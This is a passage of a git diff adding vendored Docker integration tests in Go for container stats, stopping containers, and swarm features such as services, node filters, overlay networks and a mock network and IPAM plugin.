"-d", "busybox", "top") + id1 := strings.TrimSpace(out)[:12] + c.Assert(waitRun(id1), check.IsNil) + dockerCmd(c, "stop", id1) + out, _ = dockerCmd(c, "run", "-d", "busybox", "top") + id2 := strings.TrimSpace(out)[:12] + c.Assert(waitRun(id2), check.IsNil) + + out, _ = dockerCmd(c, "stats", "--all", "--no-stream") + if !strings.Contains(out, id1) || !strings.Contains(out, id2) { + c.Fatalf("Expected stats output to contain both %s and %s, got %s", id1, id2, out) + } + + // check output contains real data, but not all zeros + reg, _ := regexp.Compile("[1-9]+") + // split output with "\n", outLines[1] is id2's output + outLines := strings.Split(out, "\n") + // check stat result of id2 contains real data + realData := reg.Find([]byte(outLines[1][12:])) + c.Assert(realData, checker.NotNil, check.Commentf("stat result of %s is empty: %s", id2, out)) + // check stat result of id1 contains all zero + realData = reg.Find([]byte(outLines[2][12:])) + c.Assert(realData, checker.IsNil, check.Commentf("stat result of %s should be empty : %s", id1, out)) +} + +func (s *DockerSuite) TestStatsAllNewContainersAdded(c *check.C) { + // Windows does not support stats + testRequires(c, DaemonIsLinux) + + id := make(chan string) + addedChan := make(chan struct{}) + + runSleepingContainer(c, "-d") + statsCmd := exec.Command(dockerBinary, "stats") + stdout, err := statsCmd.StdoutPipe() + c.Assert(err, check.IsNil) + c.Assert(statsCmd.Start(), check.IsNil) + defer statsCmd.Process.Kill() + + go func() { + containerID := <-id + matchID := regexp.MustCompile(containerID) + + scanner := bufio.NewScanner(stdout) + for scanner.Scan() { + switch { + case matchID.MatchString(scanner.Text()): + close(addedChan) + return + } + } + }() + + out, _ := runSleepingContainer(c, "-d") + c.Assert(waitRun(strings.TrimSpace(out)), check.IsNil) + id <- strings.TrimSpace(out)[:12] + + select { + case <-time.After(30 * time.Second): + c.Fatal("failed to observe new container created added to stats") + case <-addedChan: + // ignore, done + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go new file mode 100644 index 0000000000..103d01374c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go @@ -0,0 +1,17 @@ +package main + +import ( + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestStopContainerWithRestartPolicyAlways(c *check.C) { + dockerCmd(c, "run", "--name", "verifyRestart1", "-d", "--restart=always", "busybox", "false") + dockerCmd(c, "run", "--name", "verifyRestart2", "-d", "--restart=always", "busybox", "false") + + c.Assert(waitRun("verifyRestart1"), checker.IsNil) + c.Assert(waitRun("verifyRestart2"), checker.IsNil) + + dockerCmd(c, "stop", "verifyRestart1") + dockerCmd(c, "stop", "verifyRestart2") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go new file mode 100644 index 0000000000..8eae162cba --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go @@ -0,0 +1,1254 @@ +// +build !windows + +package main + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "path/filepath" + "strings" + "time" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/libnetwork/driverapi" + "github.com/docker/libnetwork/ipamapi" + remoteipam "github.com/docker/libnetwork/ipams/remote/api" + "github.com/go-check/check" + "github.com/vishvananda/netlink" +) + +func (s *DockerSwarmSuite) TestSwarmUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + getSpec := func() swarm.Spec { + sw := d.getSwarm(c) + return sw.Spec + } + + out, err := d.Cmd("swarm", "update", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + spec := getSpec() + c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour) + c.Assert(spec.Dispatcher.HeartbeatPeriod, checker.Equals, 11*time.Second) + + // setting anything under 30m for cert-expiry is not allowed + out, err = d.Cmd("swarm", "update", "--cert-expiry", "15m") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "minimum certificate expiry time") + spec = getSpec() + c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour) +} + +func (s *DockerSwarmSuite) TestSwarmInit(c *check.C) { + d := s.AddDaemon(c, false, false) + + getSpec := func() swarm.Spec { + sw := d.getSwarm(c) + return sw.Spec + } + + out, err := d.Cmd("swarm", "init", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + spec := getSpec() + c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour) + c.Assert(spec.Dispatcher.HeartbeatPeriod, checker.Equals, 11*time.Second) + + c.Assert(d.Leave(true), checker.IsNil) + time.Sleep(500 * time.Millisecond) // https://github.com/docker/swarmkit/issues/1421 + out, err = d.Cmd("swarm", "init") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + spec = getSpec() + c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 90*24*time.Hour) + c.Assert(spec.Dispatcher.HeartbeatPeriod, checker.Equals, 5*time.Second) +} + +func (s *DockerSwarmSuite) TestSwarmInitIPv6(c *check.C) { + testRequires(c, IPv6) + d1 := s.AddDaemon(c, false, false) + out, err := d1.Cmd("swarm", "init", "--listen-addr", "::1") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + d2 := s.AddDaemon(c, false, false) + out, err = d2.Cmd("swarm", "join", "::1") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + out, err = d2.Cmd("info") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + c.Assert(out, checker.Contains, "Swarm: active") +} + +func (s *DockerSwarmSuite) TestSwarmInitUnspecifiedAdvertiseAddr(c *check.C) { + d := s.AddDaemon(c, false, false) + out, err := d.Cmd("swarm", "init", "--advertise-addr", "0.0.0.0") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "advertise address must be a non-zero IP address") +} + +func (s *DockerSwarmSuite) TestSwarmIncompatibleDaemon(c *check.C) { + // init swarm mode and stop a daemon + d := s.AddDaemon(c, true, true) + info, err := d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(d.Stop(), checker.IsNil) + + // start a daemon with --cluster-store and --cluster-advertise + err = d.Start("--cluster-store=consul://consuladdr:consulport/some/path", "--cluster-advertise=1.1.1.1:2375") + c.Assert(err, checker.NotNil) + content, _ := ioutil.ReadFile(d.logFile.Name()) + c.Assert(string(content), checker.Contains, "--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode") + + // start a daemon with --live-restore + err = d.Start("--live-restore") + c.Assert(err, checker.NotNil) + content, _ = ioutil.ReadFile(d.logFile.Name()) + c.Assert(string(content), checker.Contains, "--live-restore daemon configuration is incompatible with swarm mode") + // restart for teardown + c.Assert(d.Start(), checker.IsNil) +} + +// Test case for #24090 +func (s *DockerSwarmSuite) TestSwarmNodeListHostname(c *check.C) { + d := s.AddDaemon(c, true, true) + + // The first line should contain "HOSTNAME" + out, err := d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(strings.Split(out, "\n")[0], checker.Contains, "HOSTNAME") +} + +func (s *DockerSwarmSuite) TestSwarmServiceTemplatingHostname(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("service", "create", "--name", "test", "--hostname", "{{.Service.Name}}-{{.Task.Slot}}", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + containers := d.activeContainers() + out, err = d.Cmd("inspect", "--type", "container", "--format", "{{.Config.Hostname}}", containers[0]) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.Split(out, "\n")[0], checker.Equals, "test-1", check.Commentf("hostname with templating invalid")) +} + +// Test case for #24270 +func (s *DockerSwarmSuite) TestSwarmServiceListFilter(c *check.C) { + d := s.AddDaemon(c, true, true) + + name1 := "redis-cluster-md5" + name2 := "redis-cluster" + name3 := "other-cluster" + out, err := d.Cmd("service", "create", "--name", name1, "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("service", "create", "--name", name2, "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("service", "create", "--name", name3, "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + filter1 := "name=redis-cluster-md5" + filter2 := "name=redis-cluster" + + // We search checker.Contains with `name+" "` to prevent prefix only. + out, err = d.Cmd("service", "ls", "--filter", filter1) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name1+" ") + c.Assert(out, checker.Not(checker.Contains), name2+" ") + c.Assert(out, checker.Not(checker.Contains), name3+" ") + + out, err = d.Cmd("service", "ls", "--filter", filter2) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name1+" ") + c.Assert(out, checker.Contains, name2+" ") + c.Assert(out, checker.Not(checker.Contains), name3+" ") + + out, err = d.Cmd("service", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name1+" ") + c.Assert(out, checker.Contains, name2+" ") + c.Assert(out, checker.Contains, name3+" ") +} + +func (s *DockerSwarmSuite) TestSwarmNodeListFilter(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("node", "inspect", "--format", "{{ .Description.Hostname }}", "self") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + name := strings.TrimSpace(out) + + filter := "name=" + name[:4] + + out, err = d.Cmd("node", "ls", "--filter", filter) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + + out, err = d.Cmd("node", "ls", "--filter", "name=none") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) +} + +func (s *DockerSwarmSuite) TestSwarmNodeTaskListFilter(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "redis-cluster-md5" + out, err := d.Cmd("service", "create", "--name", name, "--replicas=3", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 3) + + filter := "name=redis-cluster" + + out, err = d.Cmd("node", "ps", "--filter", filter, "self") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name+".1") + c.Assert(out, checker.Contains, name+".2") + c.Assert(out, checker.Contains, name+".3") + + out, err = d.Cmd("node", "ps", "--filter", "name=none", "self") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name+".1") + c.Assert(out, checker.Not(checker.Contains), name+".2") + c.Assert(out, checker.Not(checker.Contains), name+".3") +} + +// Test case for #25375 +func (s *DockerSwarmSuite) TestSwarmPublishAdd(c *check.C) { + d := s.AddDaemon(c, true, true) + + testCases := []struct { + name string + publishAdd []string + ports string + }{ + { + name: "simple-syntax", + publishAdd: []string{ + "80:80", + "80:80", + "80:80", + "80:20", + }, + ports: "[{ tcp 80 80 ingress}]", + }, + { + name: "complex-syntax", + publishAdd: []string{ + "target=90,published=90,protocol=tcp,mode=ingress", + "target=90,published=90,protocol=tcp,mode=ingress", + "target=90,published=90,protocol=tcp,mode=ingress", + "target=30,published=90,protocol=tcp,mode=ingress", + }, + ports: "[{ tcp 90 90 ingress}]", + }, + } + + for _, tc := range testCases { + out, err := d.Cmd("service", "create", "--name", tc.name, "--label", "x=y", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[0], tc.name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[1], tc.name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[2], "--publish-add", tc.publishAdd[3], tc.name) + c.Assert(err, checker.NotNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.EndpointSpec.Ports }}", tc.name) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, tc.ports) + } +} + +func (s *DockerSwarmSuite) TestSwarmServiceWithGroup(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "top" + out, err := d.Cmd("service", "create", "--name", name, "--user", "root:root", "--group", "wheel", "--group", "audio", "--group", "staff", "--group", "777", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + out, err = d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + container := strings.TrimSpace(out) + + out, err = d.Cmd("exec", container, "id") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "uid=0(root) gid=0(root) groups=10(wheel),29(audio),50(staff),777") +} + +func (s *DockerSwarmSuite) TestSwarmContainerAutoStart(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("network", "create", "--attachable", "-d", "overlay", "foo") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("run", "-id", "--restart=always", "--net=foo", "--name=test", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + d.Restart() + + out, err = d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") +} + +func (s *DockerSwarmSuite) TestSwarmContainerEndpointOptions(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("network", "create", "--attachable", "-d", "overlay", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + _, err = d.Cmd("run", "-d", "--net=foo", "--name=first", "--net-alias=first-alias", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + _, err = d.Cmd("run", "-d", "--net=foo", "--name=second", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // ping first container and its alias + _, err = d.Cmd("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil, check.Commentf(out)) + _, err = d.Cmd("exec", "second", "ping", "-c", "1", "first-alias") + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestSwarmContainerAttachByNetworkId(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("network", "create", "--attachable", "-d", "overlay", "testnet") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + networkID := strings.TrimSpace(out) + + out, err = d.Cmd("run", "-d", "--net", networkID, "busybox", "top") + c.Assert(err, checker.IsNil) + cID := strings.TrimSpace(out) + d.waitRun(cID) + + _, err = d.Cmd("rm", "-f", cID) + c.Assert(err, checker.IsNil) + + out, err = d.Cmd("network", "rm", "testnet") + c.Assert(err, checker.IsNil) + + checkNetwork := func(*check.C) (interface{}, check.CommentInterface) { + out, err := d.Cmd("network", "ls") + c.Assert(err, checker.IsNil) + return out, nil + } + + waitAndAssert(c, 3*time.Second, checkNetwork, checker.Not(checker.Contains), "testnet") +} + +func (s *DockerSwarmSuite) TestOverlayAttachable(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("network", "create", "-d", "overlay", "--attachable", "ovnet") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // validate attachable + out, err = d.Cmd("network", "inspect", "--format", "{{json .Attachable}}", "ovnet") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "true") + + // validate containers can attache to this overlay network + out, err = d.Cmd("run", "-d", "--network", "ovnet", "--name", "c1", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // redo validation, there was a bug that the value of attachable changes after + // containers attach to the network + out, err = d.Cmd("network", "inspect", "--format", "{{json .Attachable}}", "ovnet") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "true") +} + +func (s *DockerSwarmSuite) TestOverlayAttachableOnSwarmLeave(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create an attachable swarm network + nwName := "attovl" + out, err := d.Cmd("network", "create", "-d", "overlay", "--attachable", nwName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Connect a container to the network + out, err = d.Cmd("run", "-d", "--network", nwName, "--name", "c1", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Leave the swarm + err = d.Leave(true) + c.Assert(err, checker.IsNil) + + // Check the container is disconnected + out, err = d.Cmd("inspect", "c1", "--format", "{{.NetworkSettings.Networks."+nwName+"}}") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "") + + // Check the network is gone + out, err = d.Cmd("network", "ls", "--format", "{{.Name}}") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), nwName) +} + +func (s *DockerSwarmSuite) TestSwarmRemoveInternalNetwork(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "ingress" + out, err := d.Cmd("network", "rm", name) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Contains, name) + c.Assert(strings.TrimSpace(out), checker.Contains, "is a pre-defined network and cannot be removed") +} + +// Test case for #24108, also the case from: +// https://github.com/docker/docker/pull/24620#issuecomment-233715656 +func (s *DockerSwarmSuite) TestSwarmTaskListFilter(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "redis-cluster-md5" + out, err := d.Cmd("service", "create", "--name", name, "--replicas=3", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + filter := "name=redis-cluster" + + checkNumTasks := func(*check.C) (interface{}, check.CommentInterface) { + out, err := d.Cmd("service", "ps", "--filter", filter, name) + c.Assert(err, checker.IsNil) + return len(strings.Split(out, "\n")) - 2, nil // includes header and nl in last line + } + + // wait until all tasks have been created + waitAndAssert(c, defaultReconciliationTimeout, checkNumTasks, checker.Equals, 3) + + out, err = d.Cmd("service", "ps", "--filter", filter, name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name+".1") + c.Assert(out, checker.Contains, name+".2") + c.Assert(out, checker.Contains, name+".3") + + out, err = d.Cmd("service", "ps", "--filter", "name="+name+".1", name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name+".1") + c.Assert(out, checker.Not(checker.Contains), name+".2") + c.Assert(out, checker.Not(checker.Contains), name+".3") + + out, err = d.Cmd("service", "ps", "--filter", "name=none", name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name+".1") + c.Assert(out, checker.Not(checker.Contains), name+".2") + c.Assert(out, checker.Not(checker.Contains), name+".3") + + name = "redis-cluster-sha1" + out, err = d.Cmd("service", "create", "--name", name, "--mode=global", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + waitAndAssert(c, defaultReconciliationTimeout, checkNumTasks, checker.Equals, 1) + + filter = "name=redis-cluster" + out, err = d.Cmd("service", "ps", "--filter", filter, name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + + out, err = d.Cmd("service", "ps", "--filter", "name="+name, name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + + out, err = d.Cmd("service", "ps", "--filter", "name=none", name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) +} + +func (s *DockerSwarmSuite) TestPsListContainersFilterIsTask(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a bare container + out, err := d.Cmd("run", "-d", "--name=bare-container", "busybox", "top") + c.Assert(err, checker.IsNil) + bareID := strings.TrimSpace(out)[:12] + // Create a service + name := "busybox-top" + out, err = d.Cmd("service", "create", "--name", name, "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkServiceRunningTasks(name), checker.Equals, 1) + + // Filter non-tasks + out, err = d.Cmd("ps", "-a", "-q", "--filter=is-task=false") + c.Assert(err, checker.IsNil) + psOut := strings.TrimSpace(out) + c.Assert(psOut, checker.Equals, bareID, check.Commentf("Expected id %s, got %s for is-task label, output %q", bareID, psOut, out)) + + // Filter tasks + out, err = d.Cmd("ps", "-a", "-q", "--filter=is-task=true") + c.Assert(err, checker.IsNil) + lines := strings.Split(strings.Trim(out, "\n "), "\n") + c.Assert(lines, checker.HasLen, 1) + c.Assert(lines[0], checker.Not(checker.Equals), bareID, check.Commentf("Expected not %s, but got it for is-task label, output %q", bareID, out)) +} + +const globalNetworkPlugin = "global-network-plugin" +const globalIPAMPlugin = "global-ipam-plugin" + +func setupRemoteGlobalNetworkPlugin(c *check.C, mux *http.ServeMux, url, netDrv, ipamDrv string) { + + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"Implements": ["%s", "%s"]}`, driverapi.NetworkPluginEndpointType, ipamapi.PluginEndpointType) + }) + + // Network driver implementation + mux.HandleFunc(fmt.Sprintf("/%s.GetCapabilities", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"Scope":"global"}`) + }) + + mux.HandleFunc(fmt.Sprintf("/%s.AllocateNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&remoteDriverNetworkRequest) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.FreeNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.CreateNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&remoteDriverNetworkRequest) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.DeleteNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.CreateEndpoint", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"Interface":{"MacAddress":"a0:b1:c2:d3:e4:f5"}}`) + }) + + mux.HandleFunc(fmt.Sprintf("/%s.Join", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + + veth := &netlink.Veth{ + LinkAttrs: netlink.LinkAttrs{Name: "randomIfName", TxQLen: 0}, PeerName: "cnt0"} + if err := netlink.LinkAdd(veth); err != nil { + fmt.Fprintf(w, `{"Error":"failed to add veth pair: `+err.Error()+`"}`) + } else { + fmt.Fprintf(w, `{"InterfaceName":{ "SrcName":"cnt0", "DstPrefix":"veth"}}`) + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.Leave", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.DeleteEndpoint", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + if link, err := netlink.LinkByName("cnt0"); err == nil { + netlink.LinkDel(link) + } + fmt.Fprintf(w, "null") + }) + + // IPAM Driver implementation + var ( + poolRequest remoteipam.RequestPoolRequest + poolReleaseReq remoteipam.ReleasePoolRequest + addressRequest remoteipam.RequestAddressRequest + addressReleaseReq remoteipam.ReleaseAddressRequest + lAS = "localAS" + gAS = "globalAS" + pool = "172.28.0.0/16" + poolID = lAS + "/" + pool + gw = "172.28.255.254/16" + ) + + mux.HandleFunc(fmt.Sprintf("/%s.GetDefaultAddressSpaces", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"LocalDefaultAddressSpace":"`+lAS+`", "GlobalDefaultAddressSpace": "`+gAS+`"}`) + }) + + mux.HandleFunc(fmt.Sprintf("/%s.RequestPool", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&poolRequest) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + if poolRequest.AddressSpace != lAS && poolRequest.AddressSpace != gAS { + fmt.Fprintf(w, `{"Error":"Unknown address space in pool request: `+poolRequest.AddressSpace+`"}`) + } else if poolRequest.Pool != "" && poolRequest.Pool != pool { + fmt.Fprintf(w, `{"Error":"Cannot handle explicit pool requests yet"}`) + } else { + fmt.Fprintf(w, `{"PoolID":"`+poolID+`", "Pool":"`+pool+`"}`) + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.RequestAddress", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&addressRequest) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + // make sure libnetwork is now querying on the expected pool id + if addressRequest.PoolID != poolID { + fmt.Fprintf(w, `{"Error":"unknown pool id"}`) + } else if addressRequest.Address != "" { + fmt.Fprintf(w, `{"Error":"Cannot handle explicit address requests yet"}`) + } else { + fmt.Fprintf(w, `{"Address":"`+gw+`"}`) + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.ReleaseAddress", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&addressReleaseReq) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + // make sure libnetwork is now asking to release the expected address from the expected poolid + if addressRequest.PoolID != poolID { + fmt.Fprintf(w, `{"Error":"unknown pool id"}`) + } else if addressReleaseReq.Address != gw { + fmt.Fprintf(w, `{"Error":"unknown address"}`) + } else { + fmt.Fprintf(w, "null") + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.ReleasePool", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&poolReleaseReq) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + // make sure libnetwork is now asking to release the expected poolid + if addressRequest.PoolID != poolID { + fmt.Fprintf(w, `{"Error":"unknown pool id"}`) + } else { + fmt.Fprintf(w, "null") + } + }) + + err := os.MkdirAll("/etc/docker/plugins", 0755) + c.Assert(err, checker.IsNil) + + fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", netDrv) + err = ioutil.WriteFile(fileName, []byte(url), 0644) + c.Assert(err, checker.IsNil) + + ipamFileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", ipamDrv) + err = ioutil.WriteFile(ipamFileName, []byte(url), 0644) + c.Assert(err, checker.IsNil) +} + +func (s *DockerSwarmSuite) TestSwarmNetworkPlugin(c *check.C) { + mux := http.NewServeMux() + s.server = httptest.NewServer(mux) + c.Assert(s.server, check.NotNil, check.Commentf("Failed to start an HTTP Server")) + setupRemoteGlobalNetworkPlugin(c, mux, s.server.URL, globalNetworkPlugin, globalIPAMPlugin) + defer func() { + s.server.Close() + err := os.RemoveAll("/etc/docker/plugins") + c.Assert(err, checker.IsNil) + }() + + d := s.AddDaemon(c, true, true) + + out, err := 